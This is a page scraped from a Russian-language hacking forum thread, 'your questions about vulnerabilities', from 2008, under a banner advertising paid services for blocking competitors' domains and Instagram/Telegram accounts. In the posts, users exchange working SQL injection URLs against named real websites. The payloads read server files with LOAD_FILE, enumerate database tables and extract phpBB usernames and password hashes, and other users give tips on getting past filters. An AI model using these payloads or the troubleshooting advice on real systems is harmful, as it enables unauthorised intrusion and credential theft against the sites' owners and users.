УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 132 из 1393

132

Опции темы

Поиск в этой теме

Опции просмотра

#1311

22.03.2008, 16:51

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Цитата:

Сообщение от jokester

2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи

не проще

PHP код:


		
			
and 5=substring(version(),1,1)

? =\

__________________

#1312

22.03.2008, 16:54

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Здравствуйте, у меня два вопроса,
Первый - Пожскажите пожалуйста какую нибудь бажную CMS не сложную в установке, чтобы можно было поставить на localhost и отработать заливку шелла например.

Второе - я нашел уязвимый сайт и пытаюсь на нем прочесть файлы, путь до них беру из сообщения мускула об ошибке, но в место содержимого файла цифра за место каторой подставляю LOAD_FILE() просто не отбражается. Я уже и в hex кодировал, все равно не выводит файлы.

Сам сайт -

Цитата:

http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE('/var/www/web7/web/show_videos.php'),3/*

- так ошибка мускула

Цитата:

http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,LOAD_FILE(0x2f7661722f7777772f 776562372f7765622f73686f775f766964656f732e706870), 3/*

- так цифра не отображается

Там прав на чтение не хватает или что-то другое?

Последний раз редактировалось Spaise; 22.03.2008 в 16:56..

#1313

22.03.2008, 17:09

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...

#1314

22.03.2008, 17:14

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

Spaise
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,user(),2,3/*
web7_u1@localhost
нет прав на чтение

#1315

22.03.2008, 17:16

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

зато версия бд 5-ая
5.0.32-Debian_7etch1-log
можно раскрутить сам скуль..

#1316

22.03.2008, 17:17

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Цитата:

Сообщение от ReVOLVeR

_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...

Цитата:

http://link.raid.ru/phpmyadmin/

#1317

22.03.2008, 17:20

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Цитата:

Сообщение от ReVOLVeR

_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...

через куки from не фильтруется составляй свой запрос в куках, ну скорее и в пост не фильтруется

__________________
Карфаген должен быть разрушен...

#1318

22.03.2008, 17:20

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
меняй лимит получиш таблицы..

#1319

22.03.2008, 17:22

Spaise

Познающий

Регистрация: 21.03.2008

Сообщений: 39

Провел на форуме:
99208

Репутация: 21

Цитата:

Сообщение от ReVOLVeR

http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
меняй лимит получиш таблицы..

Мне не нужны таблици, я спрашивал про чтение файлов.

#1320

22.03.2008, 17:48

Dimi4

Reservists Of Antichat - Level 6

Регистрация: 19.03.2007

Сообщений: 953

Провел на форуме:
7617458

Репутация: 3965

Отправить сообщение для Dimi4 с помощью ICQ

Непойму в чом прикол.

Цитата:

id=1'union+select+1,2,3,4,5,COLUMN_NAME,database() ,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*

выводит нормально

Цитата:

а когда пытаюсь прочитать так:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+phpbb_users+limit+1,1/*

выводит:

Цитата:

'phpbb_users' doesn't exist

__________________

BlackHat.

MoDL

Страница 132 из 1393

132

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход